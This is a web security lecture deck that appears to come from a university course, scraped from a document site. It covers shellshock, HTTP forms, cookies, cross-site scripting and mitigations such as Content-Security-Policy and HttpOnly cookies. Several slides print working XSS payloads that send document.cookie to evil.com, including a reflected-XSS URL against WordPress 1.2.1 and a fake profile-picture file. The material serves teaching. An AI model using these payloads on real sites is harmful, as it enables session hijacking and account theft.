last time: command injection

Similar documents
injection vulnerabilities

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

Web basics: HTTP cookies

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

Web basics: HTTP cookies

WEB SECURITY: XSS & CSRF

RKN 2015 Application Layer Short Summary

Web Security: Vulnerabilities & Attacks

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

Information Security CS 526 Topic 8

Information Security CS 526 Topic 11

HTTP Security Headers Explained

CIS 4360 Secure Computer Systems XSS

CSCE 813 Internet Security Case Study II: XSS

Some Facts Web 2.0/Ajax Security

Web Security: XSS; Sessions

CSC 482/582: Computer Security. Cross-Site Security

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

Client Side Injection on Web Applications

CSP ODDITIES. Michele Spagnuolo Lukas Weichselbaum

Common Websites Security Issues. Ziv Perry

Web Security II. Slides from M. Hicks, University of Maryland

P2_L12 Web Security Page 1

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

2/16/18. Secure Coding. CYSE 411/AIT 681 Secure Software Engineering. Web Security Outline. The Web. The Web, Basically.

Web Security IV: Cross-Site Attacks

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

CS Paul Krzyzanowski

Computer Security. 14. Web Security. Paul Krzyzanowski. Rutgers University. Spring 2018

Web Security: Vulnerabilities & Attacks

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

Content Security Policy

Penetration Test Report

7.2.4 on Media content; on XSS) sws2 1

Security for the Web. Thanks to Dave Levin for some slides

Cross Site Request Forgery

Web Security: Web Application Security [continued]

BOOSTING THE SECURITY

XSSFor the win! What can be really done with Cross-Site Scripting.

Security for the Web. Thanks to Dave Levin for some slides

Match the attack to its description:

Browser code isolation

BOOSTING THE SECURITY OF YOUR ANGULAR 2 APPLICATION

CS 142 Winter Session Management. Dan Boneh

Neat tricks to bypass CSRF-protection. Mikhail

NET 311 INFORMATION SECURITY

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

CS 161 Computer Security

Web Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le

Web Security: Loose Ends

Web Security. Aggelos Kiayias Justin Neumann

Extending the browser to secure applications

More attacks on clients: Click-jacking/UI redressing, CSRF

CS 161 Computer Security

High -Tech Bridge s Web Server Security Service API Developer Documentation Version v1.3 February 13 th 2018

CSCD 303 Essential Computer Security Fall 2017

So we broke all CSPs. You won't guess what happened next!

Exploiting and Defending: Common Web Application Vulnerabilities

Server-Side Web Programming: Python (Part 1) Copyright 2017 by Robert M. Dondero, Ph.D. Princeton University

CSCD 303 Essential Computer Security Fall 2018

Progress Exchange June, Phoenix, AZ, USA 1

Lecture Overview. IN5290 Ethical Hacking. Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

Web Attacks CMSC 414. September 25 & 27, 2017

Web Security, Part 2

5/19/2015. Objectives. JavaScript, Sixth Edition. Saving State Information with Query Strings. Understanding State Information

Web Application Security

Running Remote Code is Risky. Why Study Browser Security. Browser Sandbox. Threat Models. Security User Interface.

Information Security. Gabriel Lawrence Director, IT Security UCSD

Cross-Site Request Forgery

CS144 Notes: Web Standards

Web Security Computer Security Peter Reiher December 9, 2014

Advanced Web Technology 10) XSS, CSRF and SQL Injection

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

Web Applica+on Security

Security. SWE 432, Fall 2017 Design and Implementation of Software for the Web

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

WELCOME. APEX Security Primer. About Enkitec. About the Presenter. ! Oracle Platinum Partner! Established in 2004

HTTP Protocol and Server-Side Basics

Know Your Own Risks: Content Security Policy Report Aggregation and Analysis

Web Security: Cross-Site Attacks

CSRF in the Modern Age

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

LECT 8 WEB SECURITY BROWSER SECURITY. Repetition Lect 7. WEB Security

Project 3 Web Security Part 1. Outline

Reflected XSS Cross-Site Request Forgery Other Attacks

Content Security Policy

CSE 484 / CSE M 584: Computer Security and Privacy. Web Security. Autumn Tadayoshi (Yoshi) Kohno

Static Webpage Development

Security. CSC309 TA: Sukwon Oh

CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2

Computer Security CS 426 Lecture 41

Security Course. WebGoat Lab sessions

1 Introduction. Table of Contents. Manual for

John Coggeshall Copyright 2006, Zend Technologies Inc.

logistics CHALLENGE assignment take-home portion of the final next class final exam review

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Transcription:

Web Security 1

last time: command injection 2 placing user input in more complicated language SQL shell commands input accidentally treated as commands in language instead of single value (e.g. argument/string constant) defenses: better APIs: pass constants/etc. seperately whitelisting acceptable characters escaping (if done carefully!) taint-tracking (did you forgot to do one of the above?)

a command injection example 3

other shell features 4 shells support scripting with functions cr4bd@labunix01:~$ foo() { echo "called foo; args: $*"; } cr4bd@labunix01:~$ foo quux called foo; args: quux

bash function exports 5 bash (popular shell) wanted to transfer functions from one shell to another it runs mechanism: environment variables Unix/Linux feature; passed to programs automatically example: foo() { echo "called foo"; }, want to export? set env. var. foo to () {echo "called foo"; } how would you implement this?

bash shellshock 6 if foo set to () {...;} bash ran foo() {...;}

bash shellshock 6 if foo set to () {...;} bash ran foo() {...;} if foo set to () {...;}; dangerouscommand bash ran foo() {...;}; dangerouscommand define a function; then run a command right away!

7 shellshock exploitability example: DHCP client runs program to configure a new network DHCP: most common get connected to a network protocol program is often shell (bash) script or uses shell script easy way to pass information environment variables can contain strings from network connected to network: our domain name is (){;}; dangerouscommand set env. var. DOMAIN_NAME to (){;}; dangerouscommand

more command injection 8 saw: shell comamnds, SQL one more very important category: HTML special name: cross-site scripting or XSS

stored cross-site scripting 10

the web 11 Web Browser facebook.com foobar.com (uses facebook login) evil.com (run by attacker) one web browser talks to multiple websites how does it (or does it) keep each websites seperate? even though websites can link to each other/etc.?

the browser is basically an OS 12 websites are JavaScript programs websites can communicate with each other one website can embed another cause browser to send requests to another websites can store data on the browser cookies local storage

HTTP requests 13 https://server.com/dir/file?query=string#anchor browser connects to server.com; browser sends: GET /dir/file?query=string HTTP/1.1 Host: server.com Other-Key: Other-Value

HTTP requests 13 https://server.com/dir/file?query=string#anchor browser connects to server.com; browser sends: GET /dir/file?query=string HTTP/1.1 Host: server.com Other-Key: Other-Value method: GET or POST most common GET read web page POST submit form

HTTP requests 13 https://server.com/dir/file?query=string#anchor browser connects to server.com; browser sends: GET /dir/file?query=string HTTP/1.1 Host: server.com Other-Key: Other-Value headers: extra information with request

HTTP requests 13 https://server.com/dir/file?query=string#anchor browser connects to server.com; browser sends: GET /dir/file?query=string HTTP/1.1 Host: server.com Other-Key: Other-Value example extra info: domain name from URL servers can host mutliple domains

HTTP responses 14 https://server.com/path/to/file?query=string#anchor after browser sends request; server sends: HTTP/1.1 200 OK Content-Type: text/html Other-Key: Other-Value <html>

demo 15

HTML forms (1) <form action="https://example.com/search/" method="get"> <input type="hidden" name="recipient" value="webmaster@example.com"> Search for: <input name="q" value=""><br> <input type="submit" value="search"> </form> GET /search/?q=what%20i%20searched%20for HTTP/1.1 Host: example.com q is What I searched for %20 character hexadecimal 20 (space) 16

HTML forms (2) recipient=webmaster@example.com&from=what%20i%20entered &message=some%20message%0a 17 <form action="https://example.com/formmail.pl" method="post"> <input type="hidden" name="recipient" value="webmaster@example.com"> Your email: <input name="from" value=""><br> Your message:<textarea name="message"></textarea> <input type="submit"> </form> POST /formmail.pl HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded

trusting the client (1) 18 <form action="https://example.com/formmail.pl" method="post"> <input type="hidden" name="recipient" value="webmaster@example.com"> Your email: <input name="from" value=""><br> Your message: <textarea name="message"></textarea>... <input type="submit"> </form> if this my form, can I get a recipient of spamtarget@foo.com? Am I enabling spammers??

trusting the client (1) <form action="https://example.com/formmail.pl" method="post"> <input type="hidden" name="recipient" value="webmaster@example.com"> Your email: <input name="from" value=""><br> Your message: <textarea name="message"></textarea>... <input type="submit"> </form> if this my form, can I get a recipient of spamtarget@foo.com? Am I enabling spammers?? Yes, because attacker could make own version of form 18

Referer header Submitting form at https://example.com/feedback.html: POST /formmail.pl HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded Referer: https://example.com/feedback.html recipient=webmaster@example.com&from= sometimes sent by web browser if browser always sends, does this help? 19

trusting the client (2) 20 <form action="https://example.com/formmail.pl" method="post"> <input type="hidden" name="recipient" value="webmaster@example.com">... <input type="submit"> </form> can I get a recipient of spamtarget@example.com and the right referer header? attacker can t modify the form on example.com! browser sends header with URL of form

trusting the client (2) <form action="https://example.com/formmail.pl" method="post"> <input type="hidden" name="recipient" value="webmaster@example.com">... <input type="submit"> </form> can I get a recipient of spamtarget@example.com and the right referer header? attacker can t modify the form on example.com! browser sends header with URL of form Yes, because attacker can customize their browser 20

trusting the client (3) 21 ISS E-Security Alert February 1, 2000 Form Tampering Vulnerabilities in Several Web-Based Shopping Cart Applications Many web-based shopping cart applications use hidden fields in HTML forms to hold parameters for items in an online store. These parameters can include the item's name, weight, quantity, product ID, and price. Several of these applications use a security method based on the HTTP header to verify the request is coming from an appropriate site. The ISS X-Force has identified eleven shopping cart applications that are vulnerable to form tampering.

HTTP and state 22 HTTP is stateless each request stands alone no idea of session current login? what you did before (pages read, what page you re on, etc.)? this functionality was added on later

23 implementing logins on HTTP typical mechanism: cookies information for client to send with future requests to server limited to particular domain (or domain+path) Server sets cookie set via header in HTTP response Set-Cookie: key=theinfo; domain=example.com; expires=wed, Apr Client sends back cookie with every HTTP request Cookie: key=theinfo JavaScript can also read or set Cookie

cookie fields (and more) 24 cookie data: whatever server wants; typically session ID same problems as hidden fields usually tied to database on server supposed to be kept secret by logged-in user domain: to what servers should browser send the cookie facebook.com login.facebook.com, www.facebook.com, facebook.com, etc. path: to what URLs on a server should browser send the cookie /foo server.com/foo, server.com/foo/bar, etc. expires: when the browser should forget the cookie

25 typical login implementation GET /login/ Set-Cookie: SessionID=123456789; expires= (+ login form) browser POST /login/ Cookie: SessionID=123456789 user=sillynickname42&pass=password redirect to /frontpage/ GET /frontpage/ Cookie: SessionID=12345789 (frontpage for sillynickname42) foo.com

cross-site scripting and cookies cross-site scripting: injection into webpage JavaScript has access to cookie and can send it to attacker <script> var image = new Image(); image.src = 'http://evil.com/?cookie=' + encodeuricomponent(document.cookie); </script> try to load image from evil.com using URL containing cookie evil.com operator sees cookie value 26

27 typical login implementation GET /login/ Set-Cookie: SessionID=123456789; expires= (+ login form) browser POST /login/ Cookie: SessionID=123456789 user=sillynickname42&pass=password knows it s sillynickname42 because of cookie provide same redirect cookie to /frontpage/ must be same browser! cookie is equivalent to username and password GET /frontpage/ Cookie: SessionID=12345789 (frontpage for sillynickname42) foo.com

stored cross-site scripting 29 example: forum and forum post can contain javascript everyone visiting forum will run that JavaScript attacker gets cookies from everyone attacker can pretend to be everyone

other cross-site scripting attacks 30 most common cross-site scripting (XSS) problems aren t stored nothing like forum on most websites won t just be automatically shown to all users but still a problem

reflected XSS example 31 WordPress version 1.2.1 (blog software) <input type="hidden" name="redirect_to" value="<?php echo $_GET["redirect_to"]?>" /> $_GET["redirect_to"] form input intended to be from hidden field or autogenerated link /login.php?redirect_to= foo "> <script>(new Image()).src= 'http://evil.com/'+document.cookie;</script>

exploiting reflected XSS (1) 32 how does attacker get target user to make evil request http://example.com/?redirect_to="><script>(new Image()).src='http://evil.com'+document.cookie;<script>

exploiting reflected XSS (1) 32 how does attacker get target user to make evil request http://example.com/?redirect_to="><script>(new Image()).src='http://evil.com'+document.cookie;<script> just put link/form on any web page, hope user clicks it?

exploiting reflected XSS (2) 33 iframes: <iframe src="https://example.com/?redirect_to= %22%3E%3Cscript%3Enew+Image..."> </iframe> iframe: embed another webpage on webpage example: office hour calendar on our course webpage JS can click links/forms <form action="https://example.com/">...</form> <script>document.forms[0].submit()</script>

aside embedded content 34 it s everywhere advertisements often loaded from other site embedded Twitter widget, Youtube videos, etc. newspaper might use externally hosted comments JavaScript libraries hosted elsewhere

XSS and user content XSS makes hosting user uploaded content really tricky example: allow users to upload profile pictures my profile picture is this image file: <!DOCTYPE html> <html><body><script> var image = new Image(); image.src = "https://evil.com/?cookie=" + document.cookie; </script></body></html> then I have a webpage with: <iframe src="https://example.com/get-picture?user=myusername"> 35

36 content-types to the rescue? HTTP response headers include a Content-Type Content-Type: text/html is HTML Content-Type: image/png is PNG-format image should prevent this problem if server sends it browser should try to display HTML profile pic as image, not webpage even though iframe expects a webpage

content-types and browsers 37 a few webservers consistently sent the wrong content-type example: send everything as text/plain browsers sometimes tried to compensate! example: Internet Explorer before version 8: image/png is HTML if it looks like HTML example: many browsers: text/plain is HTML if it looks like HTML

XSS mitigations 38 host dangerous stuff on different domain Content-Security-Policy HttpOnly cookies

heuristic detection 39 see if HTML from request is in response IE 8 implemented this as heuristic tricky: what if you put something that s supposed to be in page in request?

new domains for uploaded content 40 Google puts uploaded content on googleusercontent.com Github uses githubusercontent.com others do similar these domains can t leak sensitive cookies even if sanitization/mime types/etc. done wrong

Content Security Policy 41 Content-Security-Policy: HTTP header sent to browsers Content-Security-Policy: default-src 'self' 'unsafe-inline' says only load things from same host or embedded in webpage loading image from evil.com will fail Content-Security-Policy: script-src 'none'; object-src 'none'; style-src 'self' disallow all scripts, all plugins (e.g. Flash) only allow stylesheets from same host (and not inline)

Aside: why care about stylesheets? 42 inline stylesheets can steal data trick: make part of HTML be considered part of CSS URL

Content Security Policy examples 43 Content-Security-Policy: script-src 'self' www.google-analytics.com; object-src 'none' allow scripts from same host or www.google-analytics.com disallow inline scripts disallow plugins Content-Security-Policy: default-src 'none'; img-src 'self' https:// ; allow nothing to start; then whitelist what is needed recommended strategy

CSP nonces Content-Security-Policy: script-src https://foo.com 'nonce-dzjevasmvs'... <script nonce="dzjevasmvs"> // legitimate embedded script document... </script> nonce: number used only once idea: changes every time; attacker can t guess for XSS attack browser doesn t enforce that it changes; server s job 44

HTTP-only cookies 45 Set-Cookie: SessionID=123456789; HttpOnly only send cookie in HTTP cookie is not available to JS eliminates obvious way of exploiting XSS problem: JS can request webpage so cookies are sent

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback